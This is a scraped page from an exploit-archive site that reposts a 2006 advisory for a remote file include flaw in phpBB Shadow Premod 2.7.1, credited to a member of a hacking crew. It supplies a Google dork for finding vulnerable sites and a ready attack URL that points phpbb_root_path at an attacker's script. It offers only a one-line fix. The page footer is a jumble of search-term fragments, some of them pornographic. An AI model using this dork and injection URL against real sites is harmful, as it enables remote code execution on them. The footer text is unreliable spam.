about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability




2006-09-06 phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability
Rated as : High Risk

---------------------------------------------------------------------------
Shadow Prémod <= 2.7.1 [phpbb_root_path] Remote File Include
Vulnerability
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Google d0rk: "Dernière version de la Prémod Shadow sur
phpBB.biz"
---------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Shadow Prémod
version : 2.7.1
URL : http://premod-shadow.info
------------------------------------------------------------------


Exploit:
~~~~~~
Variable $phpbb_root_path not sanitized.When register_globals=on an
attacker ca
n exploit this vulnerability with a simple php injection script.

#
http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evi
l_Script]
---------------------------------------------------------------------------

Solution :
~~~~~~~~
declare variabel $phpbb_root_path
---------------------------------------------------------------------------


Shoutz:
~~~~

# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
_/*

-------------------------------- [ EOF] ----------------------------------
securitydot.net - 2006-09-06

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 08:42:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xvideos.co Root $end t166t www.momsfu wap.phon warcarft Christina www.momsfu t356t Www.silkyg t343t sex pic Www.indian Artist bol xxx.5x.pl Free java www.shwsex pmwiki t340t t878t fantasti.c Kushpu t878t Pose menan Doggy styl ISC Bind Www.Indian adodb www.shwsex bollywoods Wwwmanoram saneya mer xxx karina t741t www.google t711t last WWW.BADGRI www.bollyw mambo Remo hrrp://for zzzzzsex PHP 4.3.10 search/exp t252t irc sega.com Www.indian www.yotoub